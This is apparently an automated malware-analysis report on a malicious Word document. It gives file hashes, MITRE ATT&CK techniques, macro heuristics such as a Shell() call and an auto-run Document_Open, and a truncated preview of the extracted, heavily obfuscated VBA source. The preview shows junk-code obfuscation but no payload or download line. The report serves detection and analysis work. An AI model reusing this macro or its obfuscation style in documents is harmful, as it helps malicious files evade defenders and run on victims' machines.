Office (OLE) malware analysis — malicious · a8f8729c80c2cf2b

MALICIOUS

Office (OLE)

156.6 KB Created: 2018-07-23 11:08:00 Authoring application: Microsoft Office Word First seen: 2019-01-20

MD5: 4219a4f6273556538bf32103f175bd16 SHA-1: b2acbf4f1b5e7c365a8d543be00b86ef52e75154 SHA-256: a8f8729c80c2cf2b965608110c42c1a19da24a7986ca85a43cdfe267c87299ef

162 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample is an Office document with a high-severity OLE slack anomaly and a critical OLE_VBA_SHELL heuristic firing, indicating the presence of malicious VBA macros. The Document_Open macro is present, and the Shell() function is called, suggesting an attempt to execute arbitrary code. The VBA script is heavily obfuscated, but the presence of the Shell() call strongly implies it's designed to download and execute a second-stage payload.

Heuristics 5

VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY

OLE file is 160,384 bytes but its declared streams total only 52,921 bytes — 107,463 bytes (67%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 29534 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	29534 bytes
SHA-256: `1bf68875b137a1cc844bf647b923b5e0afc8f0781c79ffadbe68c97eef35856d`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "mVMLiwfHzQGmN" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Function DqGrcBsalmcUp() On Error Resume Next If HlPMG Xor 11 Then ElseIf OfOpP Eqv dKPwb Then If dWETnc = lBSAVo Then GEzZJ = Oct(STdfwX * 41517) End If End If If dBprN Xor 11 Then ElseIf JEozm Eqv UAvftB Then If KZNpmr = KtZXQG Then RXRLd = Oct(rzzIbW * 4692) End If End If If Truqnu Xor 11 Then ElseIf ChnwNp Eqv LznMI Then If DHznv = hVYKml Then fHNTYB = Oct(AJrjzW * 52570) End If End If If hACWV Xor 11 Then ElseIf uQLDA Eqv OPfRhj Then If DciTP = INaEOP Then dqMYUt = Oct(QWHFIc * 78715) End If End If If SDlhBr Xor 11 Then ElseIf ZUYTz Eqv QiANH Then If pimowS = NEKYwZ Then rLLNl = Oct(woQlTI * 4604) End If End If End Function Private Function UQjFdMtH() On Error Resume Next If iKYVLU <= GqVAr Then Set kLtVb = PJTpTl cBNIv = (lWHuQ * aOIqz - zzfYku + qqkXL + 41045 - jmsFs) End If If tFsdQd <= BiGTT Then Set VltERT = ERAzvZ UnWCw = (WEunu * QwpIi - rcjzs + oYoVbF + 86446 - rSwNLD) End If If FIijw Xor 11 Then ElseIf RVQivN Eqv fGJHRd Then If kzCrO = lDlFoa Then jQwqSw = Oct(tIwojS * 76101) End If End If If MUdWBK Xor 11 Then ElseIf JMziPK Eqv XtPQp Then If XiZQp = EZBuU Then iMWff = Oct(fmnSq * 97927) End If End If If WRrGJ <= DzPIVu Then Set zbWvh = ZbAco NczAbw = (joFSFl * rVrFSj - ctrZSi + uaWoDM + 91927 - FwnMv) End If End Function Private Function YSTjndVYH() On Error Resume Next If ADPCwX Xor 11 Then ElseIf iznrGt Eqv QRDNo Then If QJXBYV = uIRXLz Then zhnLsi = Oct(ofPNp * 88771) End If End If If flIGO Xor 11 Then ElseIf VKjKBj Eqv GWWoiL Then If utzfm = tYsjY Then ioqwB = Oct(OModO * 97741) End If End If If ttFjWc Xor 11 Then ElseIf jNidpz Eqv jPjHT Then If iirVF = cdHnia Then wPXRb = Oct(wFAahO * 86621) End If End If If wrcAmL Xor 11 Then ElseIf NEqBc Eqv GCfLs Then If RamjQS = CDQKnQ Then sWVGC = Oct(uIDJn * 12894) End If End If If tjFocE Xor 11 Then ElseIf LLHLir Eqv AwuDk Then If MjhZI = iJXdw Then nwJUK = Oct(KMcjK * 25732) End If End If If zzhib Xor 11 Then ElseIf NPCki Eqv zOYZvC Then If BKIwEi = MiDJG Then QNiIG = Oct(zlkAV * 64745) End If End If If CLdaX Xor 11 Then ElseIf NBUSF Eqv CnmZGV Then If dHTOq = QSwlCO Then GIWdCF = Oct(nwMLwT * 46038) End If End If End Function Private Function wrzHrQbvhRSf() On Error Resume Next If sIzRMo Xor 11 Then ElseIf LVLEh Eqv wIrdQJ Then If IBTYu = FrPnK Then OVqLd = Oct(ZKnNj * 88657) End If End If If nCNhD Xor 11 Then ElseIf ZalrpZ Eqv Ljjwh Then If DSIHw = Hrzcu Then ZhVNC = Oct(ikUbnk * 98644) End If End If If OPoWC Xor 11 Then ElseIf scGLwP Eqv FDCMMb Then If mpHnU = dPBjzl Then YnwHK = Oct(pjfTz * 18218) End If End If If zNaHR Xor 11 Then ElseIf toGiuQ Eqv vwZwr Then If PsAzj = Nwjbi Then IaKId = Oct(UcVjt * 29164) End If End If If zpbolu Xor 11 Then ElseIf cSQBIa Eqv DYTBSF Then If oUQkE = jUanl Then KZBFvG = Oct(AVYjF * 67510) End If End If End Function Private Sub Document_open() On Error Resume Next If ltMnWY Xor iCwVIY Then For BkhpY = 22 To Jqsfr kzNCb = 74081 * jwNaQ + dFUmZ + sImaK - jqihuB - vAocVz + jAobo - QluCp / 7684 / WzNwX / 6199 - rva ... (truncated)

SHA-256: 1bf68875b137a1cc844bf647b923b5e0afc8f0781c79ffadbe68c97eef35856d

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "mVMLiwfHzQGmN"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function DqGrcBsalmcUp()
On Error Resume Next
   If HlPMG Xor 11 Then
      ElseIf OfOpP Eqv dKPwb Then
      If dWETnc = lBSAVo Then
         GEzZJ = Oct(STdfwX * 41517)
      End If
   End If
   If dBprN Xor 11 Then
      ElseIf JEozm Eqv UAvftB Then
      If KZNpmr = KtZXQG Then
         RXRLd = Oct(rzzIbW * 4692)
      End If
   End If
   If Truqnu Xor 11 Then
      ElseIf ChnwNp Eqv LznMI Then
      If DHznv = hVYKml Then
         fHNTYB = Oct(AJrjzW * 52570)
      End If
   End If
   If hACWV Xor 11 Then
      ElseIf uQLDA Eqv OPfRhj Then
      If DciTP = INaEOP Then
         dqMYUt = Oct(QWHFIc * 78715)
      End If
   End If
   If SDlhBr Xor 11 Then
      ElseIf ZUYTz Eqv QiANH Then
      If pimowS = NEKYwZ Then
         rLLNl = Oct(woQlTI * 4604)
      End If
   End If
End Function
Private Function UQjFdMtH()
On Error Resume Next
   If iKYVLU <= GqVAr Then
      Set kLtVb = PJTpTl
      cBNIv = (lWHuQ * aOIqz - zzfYku + qqkXL + 41045 - jmsFs)
   End If
   If tFsdQd <= BiGTT Then
      Set VltERT = ERAzvZ
      UnWCw = (WEunu * QwpIi - rcjzs + oYoVbF + 86446 - rSwNLD)
   End If
   If FIijw Xor 11 Then
      ElseIf RVQivN Eqv fGJHRd Then
      If kzCrO = lDlFoa Then
         jQwqSw = Oct(tIwojS * 76101)
      End If
   End If
   If MUdWBK Xor 11 Then
      ElseIf JMziPK Eqv XtPQp Then
      If XiZQp = EZBuU Then
         iMWff = Oct(fmnSq * 97927)
      End If
   End If
   If WRrGJ <= DzPIVu Then
      Set zbWvh = ZbAco
      NczAbw = (joFSFl * rVrFSj - ctrZSi + uaWoDM + 91927 - FwnMv)
   End If
End Function
Private Function YSTjndVYH()
On Error Resume Next
   If ADPCwX Xor 11 Then
      ElseIf iznrGt Eqv QRDNo Then
      If QJXBYV = uIRXLz Then
         zhnLsi = Oct(ofPNp * 88771)
      End If
   End If
   If flIGO Xor 11 Then
      ElseIf VKjKBj Eqv GWWoiL Then
      If utzfm = tYsjY Then
         ioqwB = Oct(OModO * 97741)
      End If
   End If
   If ttFjWc Xor 11 Then
      ElseIf jNidpz Eqv jPjHT Then
      If iirVF = cdHnia Then
         wPXRb = Oct(wFAahO * 86621)
      End If
   End If
   If wrcAmL Xor 11 Then
      ElseIf NEqBc Eqv GCfLs Then
      If RamjQS = CDQKnQ Then
         sWVGC = Oct(uIDJn * 12894)
      End If
   End If
   If tjFocE Xor 11 Then
      ElseIf LLHLir Eqv AwuDk Then
      If MjhZI = iJXdw Then
         nwJUK = Oct(KMcjK * 25732)
      End If
   End If
   If zzhib Xor 11 Then
      ElseIf NPCki Eqv zOYZvC Then
      If BKIwEi = MiDJG Then
         QNiIG = Oct(zlkAV * 64745)
      End If
   End If
   If CLdaX Xor 11 Then
      ElseIf NBUSF Eqv CnmZGV Then
      If dHTOq = QSwlCO Then
         GIWdCF = Oct(nwMLwT * 46038)
      End If
   End If
End Function
Private Function wrzHrQbvhRSf()
On Error Resume Next
   If sIzRMo Xor 11 Then
      ElseIf LVLEh Eqv wIrdQJ Then
      If IBTYu = FrPnK Then
         OVqLd = Oct(ZKnNj * 88657)
      End If
   End If
   If nCNhD Xor 11 Then
      ElseIf ZalrpZ Eqv Ljjwh Then
      If DSIHw = Hrzcu Then
         ZhVNC = Oct(ikUbnk * 98644)
      End If
   End If
   If OPoWC Xor 11 Then
      ElseIf scGLwP Eqv FDCMMb Then
      If mpHnU = dPBjzl Then
         YnwHK = Oct(pjfTz * 18218)
      End If
   End If
   If zNaHR Xor 11 Then
      ElseIf toGiuQ Eqv vwZwr Then
      If PsAzj = Nwjbi Then
         IaKId = Oct(UcVjt * 29164)
      End If
   End If
   If zpbolu Xor 11 Then
      ElseIf cSQBIa Eqv DYTBSF Then
      If oUQkE = jUanl Then
         KZBFvG = Oct(AVYjF * 67510)
      End If
   End If
End Function
Private Sub Document_open()
On Error Resume Next
   If ltMnWY Xor iCwVIY Then
      For BkhpY = 22 To Jqsfr
         kzNCb = 74081 * jwNaQ + dFUmZ + sImaK - jqihuB - vAocVz + jAobo - QluCp / 7684 / WzNwX / 6199 - rva
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.